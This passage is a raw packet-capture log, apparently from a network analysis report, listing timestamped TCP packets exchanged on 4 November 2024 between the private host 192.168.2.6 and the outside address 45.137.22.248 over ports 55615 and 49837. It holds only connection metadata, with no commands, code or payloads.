                                                        Nov 4, 2024 04:32:24.460678101 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460720062 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460728884 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460736990 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460753918 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460766077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460773945 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460783005 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460799932 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460808992 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460818052 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460825920 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460834980 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460867882 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460876942 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460886002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460895061 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460911989 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460922003 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460937977 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460947037 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460956097 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460972071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.460998058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461008072 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461010933 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461050987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461064100 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461112976 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461122036 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461128950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461138964 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461153030 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461163998 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461173058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461182117 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461190939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461199999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461209059 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461224079 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461232901 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461241007 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461294889 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461304903 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461312056 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461321115 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461338043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461345911 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461354017 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461363077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461371899 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461380005 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461389065 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461498976 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461508989 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461517096 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461525917 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461534023 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461541891 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461551905 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461560965 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461618900 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461627960 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461636066 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461644888 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461648941 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461652040 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461656094 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461663961 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461745024 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461754084 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461761951 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461771011 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461780071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461787939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461796045 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461806059 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461813927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461822987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461867094 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461877108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461884975 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461894989 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461903095 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461913109 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461920977 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461929083 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461937904 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461946964 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461988926 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461997032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462006092 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462014914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462023973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462030888 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462045908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462055922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462064981 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462074041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462083101 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462093115 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462145090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462155104 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462163925 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462174892 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462183952 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462191105 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462201118 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462208986 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462217093 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462225914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462255955 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462265968 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462274075 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462282896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462291956 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462301016 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462313890 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462322950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462331057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462340117 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462384939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462393999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462403059 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462410927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462419987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462429047 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462438107 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462446928 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462455034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462465048 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462506056 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462515116 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462522984 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462532043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462542057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462552071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462560892 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462569952 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462578058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462587118 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462652922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462662935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462671041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462681055 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462688923 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462698936 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462707043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462717056 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462724924 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462769032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462778091 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462785959 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462795019 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462805033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462814093 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462821007 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462830067 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462837934 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462848902 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462857962 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462867975 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462877035 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462884903 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462893009 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462902069 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462910891 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462919950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462928057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462991953 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463001013 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463009119 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463012934 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463022947 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463031054 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463040113 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463048935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463057041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.504329920 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.678739071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.690970898 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691361904 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691430092 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691489935 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691541910 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691600084 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691647053 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691690922 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691756010 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691797972 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691859961 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691906929 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691963911 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692013979 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692074060 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692123890 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692178011 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692223072 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692276955 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692323923 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.695869923 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696252108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696309090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696312904 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696320057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696330070 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696362019 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696374893 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696381092 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696389914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696412086 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696420908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696445942 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696465015 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696475983 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696485043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696521044 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696526051 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696537971 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696557045 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696578026 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696594954 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696619034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696629047 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696631908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696657896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696666002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696677923 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696686029 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696711063 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696727037 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696753979 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696762085 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696794033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696816921 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696830034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696841002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696847916 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696851969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696899891 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696922064 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696932077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696935892 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696939945 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696960926 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696969032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696981907 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696997881 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697007895 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697019100 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697025061 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697052002 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697061062 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697093964 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697103024 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697144985 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697175980 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697185040 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697228909 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697230101 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697238922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697247982 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697273970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697278976 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697298050 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697328091 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697427988 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697457075 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697464943 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697469950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697484970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697494030 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697503090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697511911 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697513103 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697530985 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697555065 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697556973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697582960 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697593927 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697619915 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697640896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697649956 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697659969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697709084 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697709084 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697720051 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697725058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697741032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697757006 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697767973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697783947 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697802067 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697802067 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697812080 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697822094 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697832108 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697855949 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697918892 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697928905 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697968006 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698013067 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698029041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698033094 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698035955 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698072910 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698081970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698091030 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698091984 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698115110 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698127031 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698132992 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698137045 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698144913 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698168993 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698169947 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698179007 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698182106 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698195934 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698204994 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698206902 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698232889 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698240042 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698245049 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.698250055 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698287010 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698296070 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698331118 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698340893 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698379993 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698390007 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698411942 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698421001 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698462963 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698472023 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698508978 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698518038 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698553085 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698561907 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.698589087 CET556154983745.137.22.248192.168.2.6
